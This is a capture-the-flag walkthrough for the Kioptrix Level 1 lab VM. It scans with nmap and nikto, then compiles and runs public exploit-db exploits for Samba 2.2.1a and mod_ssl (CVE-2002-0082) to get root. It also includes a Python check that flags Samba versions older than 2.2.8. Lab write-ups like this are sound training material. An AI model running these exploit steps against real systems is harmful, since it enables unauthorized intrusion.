Kioptrix: Level 1 (#1)

Environment: both the Kioptrix VM and Kali run on my Mac host in NAT mode.

Lab subnet (CIDR): 172.16.219.0/24

  1. Find the target IP address: nmap 172.16.219.0/24

     Output:
    Nmap scan report for 172.16.219.167
    Host is up (0.00035s latency).
    Not shown: 994 closed ports
    PORT STATE SERVICE
    22/tcp open ssh
    80/tcp open http
    111/tcp open rpcbind
    139/tcp open netbios-ssn
    443/tcp open https
    1024/tcp open kdm
    MAC Address: 00:0C:29:76:B4:A0 (VMware)
    
  2. The target is 172.16.219.167. Next, enumerate its services: nmap -n -vvv -T4 -sS -A 172.16.219.167

  3. Enumerate the Samba service: enum4linux 172.16.219.167. This shows the target is running Samba 2.2.1a. Samba versions below 2.2.8 are vulnerable to remote code execution; googled it and found an exploit: https://www.exploit-db.com/exploits/10/

  4. Download the exploit, compile it, and run it against the target:

     gcc 10.c -o sambaexploit
     ./sambaexploit -b 0 172.16.219.167
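An added check, not part of the original write-up, that turns the scan and enumeration results above into a defender-side finding: it parses nmap's port table and compares a reported Samba version string (including Samba's letter patch suffix, as in 2.2.1a) against the 2.2.8 fix level named in step 3. The embedded scan text is the step 1 output; the threshold and port list are assumptions taken from this walkthrough.

```python
import re

# Scan output copied from step 1 of the walkthrough (lab VM, not a live host).
NMAP_OUTPUT = """\
Nmap scan report for 172.16.219.167
Host is up (0.00035s latency).
Not shown: 994 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
139/tcp open netbios-ssn
443/tcp open https
1024/tcp open kdm
MAC Address: 00:0C:29:76:B4:A0 (VMware)
"""

# One nmap "normal output" port line: "139/tcp open netbios-ssn"
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", re.M)

def parse_ports(text):
    """Return [(port, proto, state, service)] parsed from nmap normal output."""
    return [(int(p), proto, state, svc)
            for p, proto, state, svc in PORT_RE.findall(text)]

def samba_version_key(version):
    """Turn '2.2.1a' into a comparable tuple (2, 2, 1, 'a').

    Numeric parts compare numerically; the optional trailing letter is
    Samba's patch-level suffix and sorts after the bare release."""
    m = re.fullmatch(r"(\d+)\.(\d+)\.(\d+)([a-z]*)", version.strip())
    if not m:
        raise ValueError(f"unrecognised Samba version: {version!r}")
    major, minor, patch, suffix = m.groups()
    return (int(major), int(minor), int(patch), suffix)

def samba_below(version, threshold="2.2.8"):
    """True if `version` is older than `threshold` (default: the 2.2.8 fix level)."""
    return samba_version_key(version) < samba_version_key(threshold)

def review_host(nmap_text, samba_version=None):
    """Summarise a host's SMB exposure as a list of findings (assumed format)."""
    ports = parse_ports(nmap_text)
    smb_ports = [p for p, _, state, _ in ports if state == "open" and p in (139, 445)]
    findings = []
    if smb_ports:
        findings.append(f"SMB reachable on port(s) {smb_ports}")
    if samba_version and samba_below(samba_version):
        findings.append(f"Samba {samba_version} is older than 2.2.8; patch or restrict SMB")
    return findings
```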

Then change the root password and log in to the vulnerable Kioptrix box.

++++++++++++++++++

Other methods? How about the web server?

Scan the target with nikto: nikto -host 172.16.219.167

CVE-2002-0082 looks like a good candidate. Googled that CVE and found this exploit: https://www.exploit-db.com/exploits/764/

Download it and update the code as described in its comments; don't forget to install the required library.

Then compile the code: gcc -o openfuck 764.c -lcrypto

Run the code: ./openfuck 0x6b 172.16.219.167 -c 40
